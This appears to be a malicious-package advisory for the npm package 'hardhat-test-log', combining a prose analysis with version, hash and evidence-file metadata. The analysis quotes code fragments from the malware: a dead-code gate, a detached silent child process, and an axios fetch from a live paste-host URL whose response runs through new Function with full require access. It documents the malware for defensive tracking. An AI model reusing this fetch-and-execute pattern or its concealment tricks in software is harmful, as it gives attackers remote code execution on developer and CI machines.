-= Per source details. Do not edit below this line.=-
Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports log as the reporter, but the function contains var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); } — the dead-code gate guarantees the else branch always runs, calling utils.connectNet. utils.connectNet (lib/utils.js) spawns node lib/syncResolve.js as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output. lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } }), extracts the Cookie field from the response, and executes it in-process via new Function.constructor('require', result)(require) — giving attacker-controlled code full Node require access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will. Installing/using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.
{
"malicious-packages-origins": [
{
"versions": [
"1.1.0"
],
"sha256": "c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6",
"source": "amazon-inspector",
"modified_time": "2026-06-24T04:13:05Z",
"import_time": "2026-06-24T04:54:34.025624165Z",
"id": "IN-MAL-2026-007420"
},
{
"versions": [
"1.1.2"
],
"sha256": "741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed",
"ranges": [
{
"events": [
{
"introduced": "0"
}
],
"type": "SEMVER"
}
],
"modified_time": "2026-06-29T06:04:48Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-007763",
"import_time": "2026-06-29T07:09:10.865962004Z"
}
]
}{
"package_integrity": [
{
"filename": "hardhat-test-log-1.1.0.tgz",
"hashes": {
"sha512_sri": "sha512-YLkLCn9I3nIVSFFgBoXj4LMJl9WCwc5K0uTiRvo4Y2z03fYwWmIGF7hyC9ypZvdeE0yFzFiGs8frLzqSi+jLMA==",
"sha1": "b4ce708860e4f50e9de722399683656770515e36"
}
}
],
"evidence_files": [
{
"sha256": "44002399a2427b6245b7aba983e270b3dade9e1c7e0d669807dfaaa78cb3ebbc",
"path": "lib/syncResolve.js",
"tlsh": "14017b9e3469e02c0eb012e9af175032f6126f27310ba1e9769d9b521f7ac695502eec"
},
{
"sha256": "36c4c472f4d5f3409e527ffb69b413a6ef81c853ed6a4b82bc1ac32d19dbf371",
"path": "lib/utils.js",
"tlsh": "250231961cf760d3112a35e8aa1b6011e568b65b3208daf5bead53443f0633cd0e7ae9"
},
{
"sha256": "db6f048ab50bdad5c12883185a63f731a1ff1f9d98055ea63e34e9d28137415f",
"path": "index.js",
"tlsh": "b3f1fe322eb7153745e3faac9bcba061d12696372201cfad7a8c93104f5447894efbe4"
},
{
"sha256": "0ae78997fb4e33b7f2a18353ddeda8f65e274e766310e6dfe803cd91fb8bf26b",
"path": "README.md",
"tlsh": "b362e8f33e0a4a620f7be7c4550db5a4ff2a915cd6976a95b4ae834c23062b241ef190"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/hardhat-test-log/MAL-2026-6369.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]